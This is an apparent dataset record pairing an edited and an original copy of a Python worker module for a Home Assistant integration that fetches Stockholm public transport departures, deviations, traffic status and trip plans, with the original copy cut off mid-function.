edited_code: string, lengths 17 to 978k
original_code: string, lengths 17 to 978k
import logging import jsonpickle import isodate import time from datetime import datetime from homeassistant.util.dt import now from custom_components.hasl3.slapi import ( slapi_fp, slapi_tl2, slapi_ri4, slapi_si2, slapi_rp3, ) logger = logging.getLogger("custom_components.hasl3.worker") class HASLStatus(object): """System Status.""" startup_in_progress = True running_background_tasks = False class HASLData(object): tl2 = {} si2 = {} ri4 = {} rp3 = {} rp3keys = {} si2keys = {} ri4keys = {} fp = {} def dump(self): return { 'si2keys': self.si2keys, 'ri4keys': self.ri4keys, 'tl2': self.tl2, 'si2': self.si2, 'ri4': self.ri4, 'fp': self.fp } class HASLInstances(object): """The instance holder object object""" instances = {} instanceCount = 0 def add(self, id, updater): self.instances[id] = { 'subscriber': updater } self.instanceCount += 1 def remove(self, id): try: self.instances[id]['subscriber']() self.instanceCount -= 1 del self.instances[id] except Exception as e: logger.debug( f"Error occured while unregistering listener {str(e)}") def count(self): return self.instanceCount class HaslWorker(object): """HaslWorker.""" hass = None configuration = None status = HASLStatus() data = HASLData() instances = HASLInstances() @staticmethod def init(hass, configuration): """Return a initialized HaslWorker object.""" return HaslWorker() def debugdump(self, data): logger.debug("[debug_dump] Entered") try: timestring = time.strftime("%Y%m%d%H%M%S") outputfile = self.hass.config.path(f"hasl_debug_{timestring}.json") jsonFile = open(outputfile, "w") jsonFile.write(jsonpickle.dumps(data, unpicklable=False)) jsonFile.close() logger.debug("[debug_dump] Completed") except: logger.debug("[debug_dump] A processing error occured") def getminutesdiff(self, d1, d2): d1 = datetime.strptime(d1, "%Y-%m-%d %H:%M:%S") d2 = datetime.strptime(d2, "%Y-%m-%d %H:%M:%S") diff = (d1 - d2).total_seconds() logger.debug(f"[get_minutes_diff] diff {diff}, d1 {d1}, d2 {d2}") return diff def checksensorstate(self, sensor, state, default=True): logger.debug("[check_sensor_state] Entered") if sensor is not None and not sensor == "": try: sensor_state = self.hass.states.get(sensor) if sensor_state.state is state: logger.debug("[check_sensor_state] Completed will return TRUE/ENABLED") return True else: logger.debug("[check_sensor_state] Completed will return FALSE/DISABLED") return False except: logger.debug("[check_sensor_state] An error occured, default will be returned") return default else: logger.debug("[check_sensor_state] No sensor specified, will return default") return default async def assert_rp3(self, key, source, destination): logger.debug("[assert_rp3] Entered") listvalue = f"{source}-{destination}" if key not in self.data.rp3keys: logger.debug("[assert_rp3] Registered key") self.data.rp3keys[key] = { "api_key": key, "trips": "" } else: logger.debug("[assert_rp3] Key already present") currentvalue = self.data.rp3keys[key]['trips'] if currentvalue == "": logger.debug("[assert_rp3] Creating trip key") self.data.rp3keys[key]["trips"] = listvalue else: logger.debug("[assert_rp3] Amending to trip key") self.data.rp3keys[key]["trips"] = f"{currentvalue}|{listvalue}" if listvalue not in self.data.rp3: logger.debug("[assert_rp3] Creating default values") self.data.rp3[listvalue] = { "api_type": "slapi-si2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending", "trips": [] } logger.debug("[assert_rp3] Completed") return def parseDepartureTime(self, t): """ weird time formats from the API, do some quick and dirty 
conversions. """ try: if t == 'Nu': return 0 s = t.split() if len(s) > 1 and s[1] == 'min': return int(s[0]) s = t.split(':') if len(s) > 1: rightnow = now() min = int(s[0]) * 60 + int(s[1]) - ( (rightnow.hour * 60) + rightnow.minute) if min < 0: min = min + 1440 return min except: return return async def process_rp3(self): logger.debug("[process_rp3] Entered") for rp3key in list(self.data.rp3keys): logger.debug(f"[process_rp3] Processing key {rp3key}") rp3data = self.data.rp3keys[rp3key] api = slapi_rp3(rp3key) for tripname in '|'.join(set(rp3data["trips"].split('|'))).split('|'): logger.debug(f"[process_rp3] Processing trip {tripname}") newdata = self.data.rp3[tripname] positions = tripname.split('-') try: apidata = {} srcLocID = '' dstLocID = '' srcLocLat = '' srcLocLng = '' dstLocLat = '' dstLocLng = '' if "," in positions[0]: srcLoc = positions[0].split(',') srcLocLat = srcLoc[0] srcLocLng = srcLoc[1] else: srcLocID = positions[0] if "," in positions[1]: dstLoc = positions[1].split(',') dstLocLat = dstLoc[0] dstLocLng = dstLoc[1] else: dstLocID = positions[1] apidata = await api.request(srcLocID, dstLocID, srcLocLat, srcLocLng, dstLocLat, dstLocLng) newdata['trips'] = [] # Parse every trip for trip in apidata["Trip"]: newtrip = { 'fares': [], 'legs': [] } # Loop all fares and add for fare in trip['TariffResult']['fareSetItem'][0]['fareItem']: newfare = {} newfare['name'] = fare['name'] newfare['desc'] = fare['desc'] newfare['price'] = int(fare['price']) / 100 newtrip['fares'].append(newfare) # Add legs to trips for leg in trip['LegList']['Leg']: newleg = {} # Walking is done by humans. # And robots. # Robots are scary. if leg["type"] == "WALK": newleg['name'] = leg['name'] newleg['line'] = 'Walk' newleg['direction'] = 'Walk' newleg['category'] = 'WALK' else: newleg['name'] = leg['Product']['name'] newleg['line'] = leg['Product']['line'] newleg['direction'] = leg['direction'] newleg['category'] = leg['category'] newleg['from'] = leg['Origin']['name'] newleg['to'] = leg['Destination']['name'] newleg['time'] = f"{leg["Origin"]["date"]} {leg["Origin"]["time"]}" if leg.get('Stops'): if leg['Stops'].get('Stop', {}): newleg['stops'] = [] for stop in leg.get('Stops', {}).get('Stop', {}): newleg['stops'].append(stop) newtrip['legs'].append(newleg) # Make some shortcuts for data newtrip['first_leg'] = newtrip['legs'][0]['name'] newtrip['time'] = newtrip['legs'][0]['time'] newtrip['price'] = newtrip['fares'][0]['price'] newtrip['duration'] = str(isodate.parse_duration(trip['duration'])) newtrip['transfers'] = trip['transferCount'] newdata['trips'].append(newtrip) # Add shortcuts to info in the first trip if it exists firstLegFirstTrip = next((x for x in newdata['trips'][0]['legs'] if x["category"] != "WALK"), []) lastLegLastTrip = next((x for x in reversed(newdata['trips'][0]['legs']) if x["category"] != "WALK"), []) newdata['transfers'] = sum(p["category"] != "WALK" for p in newdata['trips'][0]['legs']) - 1 or 0 newdata['price'] = newdata['trips'][0]['price'] or '' newdata['time'] = newdata['trips'][0]['time'] or '' newdata['duration'] = newdata['trips'][0]['duration'] or '' newdata['from'] = newdata['trips'][0]['legs'][0]['from'] or '' newdata['to'] = newdata['trips'][0]['legs'][len(newdata['trips'][0]['legs']) - 1]['to'] or '' newdata['origin'] = {} newdata['origin']['leg'] = firstLegFirstTrip["name"] or '' newdata['origin']['line'] = firstLegFirstTrip["line"] or '' newdata['origin']['direction'] = firstLegFirstTrip["direction"] or '' newdata['origin']['category'] = 
firstLegFirstTrip["category"] or '' newdata['origin']['time'] = firstLegFirstTrip["time"] or '' newdata['origin']['from'] = firstLegFirstTrip["from"] or '' newdata['origin']['to'] = firstLegFirstTrip["to"] or '' newdata['destination'] = {} newdata['destination']['leg'] = lastLegLastTrip["name"] or '' newdata['destination']['line'] = lastLegLastTrip["line"] or '' newdata['destination']['direction'] = lastLegLastTrip["direction"] or '' newdata['destination']['category'] = lastLegLastTrip["category"] or '' newdata['destination']['time'] = lastLegLastTrip["time"] or '' newdata['destination']['from'] = lastLegLastTrip["from"] or '' newdata['destination']['to'] = lastLegLastTrip["to"] or '' newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" except Exception as e: logger.debug(f"[process_rp3] Error occured: {str(e)}") newdata['api_result'] = "Error" newdata['api_error'] = str(e) newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.rp3[tripname] = newdata logger.debug(f"[process_rp3] Completed trip {tripname}") logger.debug(f"[process_rp3] Completed key {rp3key}") logger.debug("[process_rp3] Completed") async def assert_fp(self, traintype): logger.debug("[assert_fp] Entered") if traintype not in self.data.fp: logger.debug(f"[assert_fp] Registering {traintype}") self.data.fp[traintype] = { "api_type": "slapi-fp1", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } else: logger.debug(f"[assert_fp] {traintype} already registered") logger.debug("[assert_fp] Completed") return async def process_fp(self, notarealarg=None): logger.debug("[process_rp3] Entered") api = slapi_fp() for traintype in list(self.data.fp): logger.debug(f"[process_rp3] Processing {traintype}") newdata = self.data.fp[traintype] try: newdata['data'] = await api.request(traintype) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_rp3] Completed {traintype}") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_rp3] Error occured for {traintype}: {str(e)}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.fp[traintype] = newdata logger.debug("[process_rp3] Completed") async def assert_si2_stop(self, key, stop): await self.assert_si2(key, f"stop_{stop}", "stops", stop) async def assert_si2_line(self, key, line): await self.assert_si2(key, f"line_{line}", "lines", line) async def assert_si2(self, key, datakey, listkey, listvalue): logger.debug("[assert_si2] Entered") if key not in self.data.si2keys: logger.debug("[assert_si2] Registering key") self.data.si2keys[key] = { "api_key": key, "stops": "", "lines": "" } else: logger.debug("[assert_si2] Key already present") if self.data.si2keys[key][listkey] == "": logger.debug("[assert_si2] Creating trip key") self.data.si2keys[key][listkey] = listvalue else: logger.debug("[assert_si2] Appending to trip key") self.data.si2keys[key][listkey] = f"{self.data.si2keys[key][listkey]},{listvalue}" if datakey not in self.data.si2: logger.debug("[assert_si2] Creating default values") self.data.si2[datakey] = { "api_type": "slapi-si2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } logger.debug("[assert_si2] Completed") return async def process_si2(self, notarealarg=None): logger.debug("[process_si2] Entered") for si2key in list(self.data.si2keys): 
logger.debug(f"[process_si2] Processing key {si2key}") si2data = self.data.si2keys[si2key] api = slapi_si2(si2key, 60) for stop in ','.join(set(si2data["stops"].split(','))).split(','): logger.debug(f"[process_si2] Processing stop {stop}") newdata = self.data.si2[f"stop_{stop}"] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: deviationdata = await api.request(stop, '') deviationdata = deviationdata['ResponseData'] deviations = [] for (idx, value) in enumerate(deviationdata): deviations.append({ 'updated': value['Updated'], 'title': value['Header'], 'fromDate': value['FromDateTime'], 'toDate': value['UpToDateTime'], 'details': value['Details'], 'sortOrder': value['SortOrder'], }) newdata['data'] = sorted(deviations, key=lambda k: k['sortOrder']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_si2] Processing stop {stop} completed") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_si2] An error occured during processing of stop {stop}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.si2[f"stop_{stop}"] = newdata logger.debug( f"[process_si2] Completed processing of stop {stop}") for line in ','.join(set(si2data["lines"].split(','))).split(','): logger.debug(f"[process_si2] Processing line {line}") newdata = self.data.si2[f"line_{line}"] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: deviationdata = await api.request('', line) deviationdata = deviationdata['ResponseData'] deviations = [] for (idx, value) in enumerate(deviationdata): deviations.append({ 'updated': value['Updated'], 'title': value['Header'], 'fromDate': value['FromDateTime'], 'toDate': value['UpToDateTime'], 'details': value['Details'], 'sortOrder': value['SortOrder'], }) newdata['data'] = sorted(deviations, key=lambda k: k['sortOrder']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_si2] Processing line {line} completed") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_si2] An error occured during processing of line {line}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.si2[f"line_{line}"] = newdata logger.debug(f"[process_si2] Completed processing of line {line}") logger.debug(f"[process_si2] Completed processing key {si2key}") logger.debug("[process_si2] Completed") return async def assert_ri4(self, key, stop): logger.debug("[assert_ri4] Entered") stopkey = str(stop) if key not in self.data.ri4keys: logger.debug("[assert_ri4] Registering key and stop") self.data.ri4keys[key] = { "api_key": key, "stops": stopkey } else: logger.debug("[assert_ri4] Adding stop to existing key") self.data.ri4keys[key]["stops"] = f"{self.data.ri4keys[key]["stops"]},{stopkey}" if stop not in self.data.ri4: logger.debug("[assert_ri4] Creating default data") self.data.ri4[stopkey] = { "api_type": "slapi-ri4", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } logger.debug("[assert_ri4] Completed") return async def process_ri4(self, notarealarg=None): logger.debug("[process_ri4] Entered") iconswitcher = { 'Buses': 'mdi:bus', 'Trams': 'mdi:tram', 'Ships': 'mdi:ferry', 'Metros': 'mdi:subway-variant', 'Trains': 'mdi:train', } for ri4key in list(self.data.ri4keys): logger.debug(f"[process_ri4] Processing key 
{ri4key}") ri4data = self.data.ri4keys[ri4key] api = slapi_ri4(ri4key, 60) for stop in ','.join(set(ri4data["stops"].split(','))).split(','): logger.debug(f"[process_ri4] Processing stop {stop}") newdata = self.data.ri4[stop] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: departures = [] departuredata = await api.request(stop) departuredata = departuredata['ResponseData'] for (i, traffictype) in enumerate(['Metros', 'Buses', 'Trains', 'Trams', 'Ships']): for (idx, value) in enumerate( departuredata[traffictype]): direction = value['JourneyDirection'] or 0 displaytime = value['DisplayTime'] or '' destination = value['Destination'] or '' linenumber = value['LineNumber'] or '' expected = value['ExpectedDateTime'] or '' groupofline = value['GroupOfLine'] or '' icon = iconswitcher.get(traffictype, 'mdi:train-car') diff = self.parseDepartureTime(displaytime) departures.append({ 'line': linenumber, 'direction': direction, 'departure': displaytime, 'destination': destination, 'time': diff, 'expected': datetime.strptime( expected, '%Y-%m-%dT%H:%M:%S' ), 'type': traffictype, 'groupofline': groupofline, 'icon': icon, }) newdata['data'] = sorted(departures, key=lambda k: k['time']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_ri4] Stop {stop} updated sucessfully") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_ri4] Error occured during update {stop}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.ri4[stop] = newdata logger.debug(f"[process_ri4] Completed stop {stop}") logger.debug(f"[process_ri4] Completed key {ri4key}") logger.debug("[process_ri4] Completed") return async def assert_tl2(self, key): logger.debug("[assert_tl2] Entered") if key not in self.data.tl2: logger.debug("[assert_tl2] Registering key") self.data.tl2[key] = { "api_type": "slapi-tl2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } else: logger.debug("[assert_tl2] Key already present") logger.debug("[assert_tl2] Completed") return async def process_tl2(self, notarealarg=None): logger.debug("[process_tl2] Entered") for tl2key in list(self.data.tl2): logger.debug(f"[process_tl2] Processing {tl2key}") newdata = self.data.tl2[tl2key] statuses = { 'EventGood': 'Good', 'EventMinor': 'Minor', 'EventMajor': 'Closed', 'EventPlanned': 'Planned', } # Icon table used for HomeAssistant. statusIcons = { 'EventGood': 'mdi:check', 'EventMinor': 'mdi:clock-alert-outline', 'EventMajor': 'mdi:close', 'EventPlanned': 'mdi:triangle-outline' } try: api = slapi_tl2(tl2key) apidata = await api.request() apidata = apidata['ResponseData']['TrafficTypes'] responselist = {} for response in apidata: statustype = ('ferry' if response['Type'] == 'fer' else response['Type']) for event in response['Events']: event['Status'] = statuses.get(event['StatusIcon']) event['StatusIcon'] = \ statusIcons.get(event['StatusIcon']) responsedata = { 'status': statuses.get(response['StatusIcon']), 'status_icon': statusIcons.get(response['StatusIcon']), 'events': response['Events'] } responselist[statustype] = responsedata # Attribution and update sensor data. 
newdata['data'] = responselist newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_tl2] Update of {tl2key} succeeded") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_tl2] Update of {tl2key} failed") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.tl2[tl2key] = newdata logger.debug(f"[process_tl2] Completed {tl2key}") logger.debug("[process_tl2] Completed") return
import logging import jsonpickle import isodate import time from datetime import datetime from homeassistant.util.dt import now from custom_components.hasl3.slapi import ( slapi_fp, slapi_tl2, slapi_ri4, slapi_si2, slapi_rp3, ) logger = logging.getLogger("custom_components.hasl3.worker") class HASLStatus(object): """System Status.""" startup_in_progress = True running_background_tasks = False class HASLData(object): tl2 = {} si2 = {} ri4 = {} rp3 = {} rp3keys = {} si2keys = {} ri4keys = {} fp = {} def dump(self): return { 'si2keys': self.si2keys, 'ri4keys': self.ri4keys, 'tl2': self.tl2, 'si2': self.si2, 'ri4': self.ri4, 'fp': self.fp } class HASLInstances(object): """The instance holder object object""" instances = {} instanceCount = 0 def add(self, id, updater): self.instances[id] = { 'subscriber': updater } self.instanceCount += 1 def remove(self, id): try: self.instances[id]['subscriber']() self.instanceCount -= 1 del self.instances[id] except Exception as e: logger.debug( f"Error occured while unregistering listener {str(e)}") def count(self): return self.instanceCount class HaslWorker(object): """HaslWorker.""" hass = None configuration = None status = HASLStatus() data = HASLData() instances = HASLInstances() @staticmethod def init(hass, configuration): """Return a initialized HaslWorker object.""" return HaslWorker() def debugdump(self, data): logger.debug("[debug_dump] Entered") try: timestring = time.strftime("%Y%m%d%H%M%S") outputfile = self.hass.config.path(f"hasl_debug_{timestring}.json") jsonFile = open(outputfile, "w") jsonFile.write(jsonpickle.dumps(data, unpicklable=False)) jsonFile.close() logger.debug("[debug_dump] Completed") except: logger.debug("[debug_dump] A processing error occured") def getminutesdiff(self, d1, d2): d1 = datetime.strptime(d1, "%Y-%m-%d %H:%M:%S") d2 = datetime.strptime(d2, "%Y-%m-%d %H:%M:%S") diff = (d1 - d2).total_seconds() logger.debug(f"[get_minutes_diff] diff {diff}, d1 {d1}, d2 {d2}") return diff def checksensorstate(self, sensor, state, default=True): logger.debug("[check_sensor_state] Entered") if sensor is not None and not sensor == "": try: sensor_state = self.hass.states.get(sensor) if sensor_state.state is state: logger.debug("[check_sensor_state] Completed will return TRUE/ENABLED") return True else: logger.debug("[check_sensor_state] Completed will return FALSE/DISABLED") return False except: logger.debug("[check_sensor_state] An error occured, default will be returned") return default else: logger.debug("[check_sensor_state] No sensor specified, will return default") return default async def assert_rp3(self, key, source, destination): logger.debug("[assert_rp3] Entered") listvalue = f"{source}-{destination}" if key not in self.data.rp3keys: logger.debug("[assert_rp3] Registered key") self.data.rp3keys[key] = { "api_key": key, "trips": "" } else: logger.debug("[assert_rp3] Key already present") currentvalue = self.data.rp3keys[key]['trips'] if currentvalue == "": logger.debug("[assert_rp3] Creating trip key") self.data.rp3keys[key]["trips"] = listvalue else: logger.debug("[assert_rp3] Amending to trip key") self.data.rp3keys[key]["trips"] = f"{currentvalue}|{listvalue}" if listvalue not in self.data.rp3: logger.debug("[assert_rp3] Creating default values") self.data.rp3[listvalue] = { "api_type": "slapi-si2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending", "trips": [] } logger.debug("[assert_rp3] Completed") return def parseDepartureTime(self, t): """ weird time formats from the API, do some quick and dirty 
conversions. """ try: if t == 'Nu': return 0 s = t.split() if len(s) > 1 and s[1] == 'min': return int(s[0]) s = t.split(':') if len(s) > 1: rightnow = now() min = int(s[0]) * 60 + int(s[1]) - ( (rightnow.hour * 60) + rightnow.minute) if min < 0: min = min + 1440 return min except: return return async def process_rp3(self): logger.debug("[process_rp3] Entered") for rp3key in list(self.data.rp3keys): logger.debug(f"[process_rp3] Processing key {rp3key}") rp3data = self.data.rp3keys[rp3key] api = slapi_rp3(rp3key) for tripname in '|'.join(set(rp3data["trips"].split('|'))).split('|'): logger.debug(f"[process_rp3] Processing trip {tripname}") newdata = self.data.rp3[tripname] positions = tripname.split('-') try: apidata = {} srcLocID = '' dstLocID = '' srcLocLat = '' srcLocLng = '' dstLocLat = '' dstLocLng = '' if "," in positions[0]: srcLoc = positions[0].split(',') srcLocLat = srcLoc[0] srcLocLng = srcLoc[1] else: srcLocID = positions[0] if "," in positions[1]: dstLoc = positions[1].split(',') dstLocLat = dstLoc[0] dstLocLng = dstLoc[1] else: dstLocID = positions[1] apidata = await api.request(srcLocID, dstLocID, srcLocLat, srcLocLng, dstLocLat, dstLocLng) newdata['trips'] = [] # Parse every trip for trip in apidata["Trip"]: newtrip = { 'fares': [], 'legs': [] } # Loop all fares and add for fare in trip['TariffResult']['fareSetItem'][0]['fareItem']: newfare = {} newfare['name'] = fare['name'] newfare['desc'] = fare['desc'] newfare['price'] = int(fare['price']) / 100 newtrip['fares'].append(newfare) # Add legs to trips for leg in trip['LegList']['Leg']: newleg = {} # Walking is done by humans. # And robots. # Robots are scary. if leg["type"] == "WALK": newleg['name'] = leg['name'] newleg['line'] = 'Walk' newleg['direction'] = 'Walk' newleg['category'] = 'WALK' else: newleg['name'] = leg['Product']['name'] newleg['line'] = leg['Product']['line'] newleg['direction'] = leg['direction'] newleg['category'] = leg['category'] newleg['from'] = leg['Origin']['name'] newleg['to'] = leg['Destination']['name'] newleg['time'] = f"{leg['Origin']['date']} {leg['Origin']['time']}" if leg.get('Stops'): if leg['Stops'].get('Stop', {}): newleg['stops'] = [] for stop in leg.get('Stops', {}).get('Stop', {}): newleg['stops'].append(stop) newtrip['legs'].append(newleg) # Make some shortcuts for data newtrip['first_leg'] = newtrip['legs'][0]['name'] newtrip['time'] = newtrip['legs'][0]['time'] newtrip['price'] = newtrip['fares'][0]['price'] newtrip['duration'] = str(isodate.parse_duration(trip['duration'])) newtrip['transfers'] = trip['transferCount'] newdata['trips'].append(newtrip) # Add shortcuts to info in the first trip if it exists firstLegFirstTrip = next((x for x in newdata['trips'][0]['legs'] if x["category"] != "WALK"), []) lastLegLastTrip = next((x for x in reversed(newdata['trips'][0]['legs']) if x["category"] != "WALK"), []) newdata['transfers'] = sum(p["category"] != "WALK" for p in newdata['trips'][0]['legs']) - 1 or 0 newdata['price'] = newdata['trips'][0]['price'] or '' newdata['time'] = newdata['trips'][0]['time'] or '' newdata['duration'] = newdata['trips'][0]['duration'] or '' newdata['from'] = newdata['trips'][0]['legs'][0]['from'] or '' newdata['to'] = newdata['trips'][0]['legs'][len(newdata['trips'][0]['legs']) - 1]['to'] or '' newdata['origin'] = {} newdata['origin']['leg'] = firstLegFirstTrip["name"] or '' newdata['origin']['line'] = firstLegFirstTrip["line"] or '' newdata['origin']['direction'] = firstLegFirstTrip["direction"] or '' newdata['origin']['category'] = 
firstLegFirstTrip["category"] or '' newdata['origin']['time'] = firstLegFirstTrip["time"] or '' newdata['origin']['from'] = firstLegFirstTrip["from"] or '' newdata['origin']['to'] = firstLegFirstTrip["to"] or '' newdata['destination'] = {} newdata['destination']['leg'] = lastLegLastTrip["name"] or '' newdata['destination']['line'] = lastLegLastTrip["line"] or '' newdata['destination']['direction'] = lastLegLastTrip["direction"] or '' newdata['destination']['category'] = lastLegLastTrip["category"] or '' newdata['destination']['time'] = lastLegLastTrip["time"] or '' newdata['destination']['from'] = lastLegLastTrip["from"] or '' newdata['destination']['to'] = lastLegLastTrip["to"] or '' newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" except Exception as e: logger.debug(f"[process_rp3] Error occured: {str(e)}") newdata['api_result'] = "Error" newdata['api_error'] = str(e) newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.rp3[tripname] = newdata logger.debug(f"[process_rp3] Completed trip {tripname}") logger.debug(f"[process_rp3] Completed key {rp3key}") logger.debug("[process_rp3] Completed") async def assert_fp(self, traintype): logger.debug("[assert_fp] Entered") if traintype not in self.data.fp: logger.debug(f"[assert_fp] Registering {traintype}") self.data.fp[traintype] = { "api_type": "slapi-fp1", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } else: logger.debug(f"[assert_fp] {traintype} already registered") logger.debug("[assert_fp] Completed") return async def process_fp(self, notarealarg=None): logger.debug("[process_rp3] Entered") api = slapi_fp() for traintype in list(self.data.fp): logger.debug(f"[process_rp3] Processing {traintype}") newdata = self.data.fp[traintype] try: newdata['data'] = await api.request(traintype) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_rp3] Completed {traintype}") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_rp3] Error occured for {traintype}: {str(e)}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.fp[traintype] = newdata logger.debug("[process_rp3] Completed") async def assert_si2_stop(self, key, stop): await self.assert_si2(key, f"stop_{stop}", "stops", stop) async def assert_si2_line(self, key, line): await self.assert_si2(key, f"line_{line}", "lines", line) async def assert_si2(self, key, datakey, listkey, listvalue): logger.debug("[assert_si2] Entered") if key not in self.data.si2keys: logger.debug("[assert_si2] Registering key") self.data.si2keys[key] = { "api_key": key, "stops": "", "lines": "" } else: logger.debug("[assert_si2] Key already present") if self.data.si2keys[key][listkey] == "": logger.debug("[assert_si2] Creating trip key") self.data.si2keys[key][listkey] = listvalue else: logger.debug("[assert_si2] Appending to trip key") self.data.si2keys[key][listkey] = f"{self.data.si2keys[key][listkey]},{listvalue}" if datakey not in self.data.si2: logger.debug("[assert_si2] Creating default values") self.data.si2[datakey] = { "api_type": "slapi-si2", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } logger.debug("[assert_si2] Completed") return async def process_si2(self, notarealarg=None): logger.debug("[process_si2] Entered") for si2key in list(self.data.si2keys): 
logger.debug(f"[process_si2] Processing key {si2key}") si2data = self.data.si2keys[si2key] api = slapi_si2(si2key, 60) for stop in ','.join(set(si2data["stops"].split(','))).split(','): logger.debug(f"[process_si2] Processing stop {stop}") newdata = self.data.si2[f"stop_{stop}"] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: deviationdata = await api.request(stop, '') deviationdata = deviationdata['ResponseData'] deviations = [] for (idx, value) in enumerate(deviationdata): deviations.append({ 'updated': value['Updated'], 'title': value['Header'], 'fromDate': value['FromDateTime'], 'toDate': value['UpToDateTime'], 'details': value['Details'], 'sortOrder': value['SortOrder'], }) newdata['data'] = sorted(deviations, key=lambda k: k['sortOrder']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_si2] Processing stop {stop} completed") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_si2] An error occured during processing of stop {stop}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.si2[f"stop_{stop}"] = newdata logger.debug( f"[process_si2] Completed processing of stop {stop}") for line in ','.join(set(si2data["lines"].split(','))).split(','): logger.debug(f"[process_si2] Processing line {line}") newdata = self.data.si2[f"line_{line}"] # TODO: CHECK FOR FRESHNESS TO NOT KILL OFF THE KEYS try: deviationdata = await api.request('', line) deviationdata = deviationdata['ResponseData'] deviations = [] for (idx, value) in enumerate(deviationdata): deviations.append({ 'updated': value['Updated'], 'title': value['Header'], 'fromDate': value['FromDateTime'], 'toDate': value['UpToDateTime'], 'details': value['Details'], 'sortOrder': value['SortOrder'], }) newdata['data'] = sorted(deviations, key=lambda k: k['sortOrder']) newdata['attribution'] = "Stockholms Lokaltrafik" newdata['last_updated'] = now().strftime('%Y-%m-%d %H:%M:%S') newdata['api_result'] = "Success" logger.debug(f"[process_si2] Processing line {line} completed") except Exception as e: newdata['api_result'] = "Error" newdata['api_error'] = str(e) logger.debug(f"[process_si2] An error occured during processing of line {line}") newdata['api_lastrun'] = now().strftime('%Y-%m-%d %H:%M:%S') self.data.si2[f"line_{line}"] = newdata logger.debug(f"[process_si2] Completed processing of line {line}") logger.debug(f"[process_si2] Completed processing key {si2key}") logger.debug("[process_si2] Completed") return async def assert_ri4(self, key, stop): logger.debug("[assert_ri4] Entered") stopkey = str(stop) if key not in self.data.ri4keys: logger.debug("[assert_ri4] Registering key and stop") self.data.ri4keys[key] = { "api_key": key, "stops": stopkey } else: logger.debug("[assert_ri4] Adding stop to existing key") self.data.ri4keys[key]["stops"] = f"{self.data.ri4keys[key]['stops']},{stopkey}" if stop not in self.data.ri4: logger.debug("[assert_ri4] Creating default data") self.data.ri4[stopkey] = { "api_type": "slapi-ri4", "api_lastrun": '1970-01-01 01:01:01', "api_result": "Pending" } logger.debug("[assert_ri4] Completed") return async def process_ri4(self, notarealarg=None): logger.debug("[process_ri4] Entered") iconswitcher = { 'Buses': 'mdi:bus', 'Trams': 'mdi:tram', 'Ships': 'mdi:ferry', 'Metros': 'mdi:subway-variant', 'Trains': 'mdi:train', } for ri4key in list(self.data.ri4keys): logger.debug(f"[process_ri4] Processing key 
